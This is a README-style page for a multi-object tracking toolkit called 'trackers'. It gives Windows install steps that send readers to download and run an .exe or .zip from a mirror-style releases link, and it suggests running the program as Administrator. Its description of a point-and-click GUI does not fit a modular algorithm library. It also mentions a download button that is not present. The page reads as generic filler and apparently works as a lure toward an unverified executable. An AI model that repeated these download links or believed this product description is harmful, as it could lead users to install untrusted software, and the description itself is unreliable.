trackers is a collection of clean and modular versions of popular multi-object tracking algorithms. These tools work well with any detection software you already use. They help you follow multiple moving objects in videos or images. The code is open and uses the Apache 2.0 license, which means you can use it freely.
Before you start, make sure your computer meets the following:
- Operating System: Windows 10 or later
- CPU: 2 GHz or faster processor
- RAM: 8 GB minimum (16 GB recommended)
- Disk Space: At least 500 MB free
- Graphics: No special GPU needed, but a modern graphics card can speed things up
- Internet: Required for downloading the software
- Multiple tracking algorithms included, such as ByteTrack, OC-SORT, and SORT
- Works with any object detection model you have
- Clean interface to organize and test tracking methods
- Lightweight and fast on standard Windows computers
- Open-source and easy to customize if you have programming skills
To get started, visit this page to download the latest version of trackers:
Click the link above or the big red button at the top to open the releases page. You will find a list of files for different versions. Pick the one that matches your Windows system (usually a file with .exe or .zip extension).
Follow these steps to install trackers on your Windows PC:
-
Go to the Download Page
Open your web browser and visit the trackers releases page here:
https://github.com/gitovamb/trackers/releases -
Choose the Right File
Look for the latest release at the top. You will see several files. Download the.exefile if available for the easiest install. If only.zipis available, download that instead. -
Run the Installer
- If you downloaded an
.exefile, double-click it to start the installation. - Follow the prompts on the screen. Choose the default options unless you need something custom.
- The installer will set up everything and create a shortcut on your desktop.
- If you downloaded an
-
Extract Files (for
.zipDownload)- If you downloaded a
.zipfile, right-click it and choose “Extract All.” - Choose a folder you can easily find, like your desktop or documents.
- Open the extracted folder and look for a file named
trackers.exeor similar. Double-click it to run.
- If you downloaded a
-
Run the Program
Once installed or extracted, double-click the tracker application’s icon to open it. You should see the main window showing available tracking algorithms.
After opening trackers, follow these simple steps:
-
Load Your Video or Images
Click the button labeled “Open File” or “Load Video.” Select the video or image series where you want to track objects. -
Select a Tracking Algorithm
Choose one of the tracking methods like ByteTrack, OC-SORT, or SORT from the list. Each option includes a short description. -
Run the Tracker
Click “Start Tracking.” The program will analyze your video and show the tracked objects in real time. -
Save the Results
After the tracking finishes, you can save the output. Look for the “Export” or “Save” button to create a new video or a data file with tracking info.
You can adjust a few basic settings without technical skills:
- Tracking Speed: Choose between faster processing or higher accuracy.
- Display Options: Turn on or off bounding boxes and object labels.
- Output Format: Save results in video file or CSV for further analysis.
If you want to customize beyond this, you will need programming knowledge to modify the algorithms.
- Program Won’t Start: Check if your Windows system is updated. Try running the program as Administrator.
- Video Won't Load: Make sure the video format is supported, such as MP4 or AVI.
- Tracking Errors or Jumps: Try selecting a different tracker algorithm or use a clearer video.
- Slow Performance: Close unnecessary programs and check if your PC meets system requirements.
-
Visit the GitHub releases page anytime to get updates:
https://github.com/gitovamb/trackers/releases -
The repository also hosts basic user guides and example videos to help you understand different trackers.
If you know basic coding or want to experiment:
- The software is open source under Apache 2.0 license
- You can combine trackers with your own detection models
- Source code is well-structured and modular for easy changes
- Check topics like bytetrack or OC-SORT in the repository for algorithm details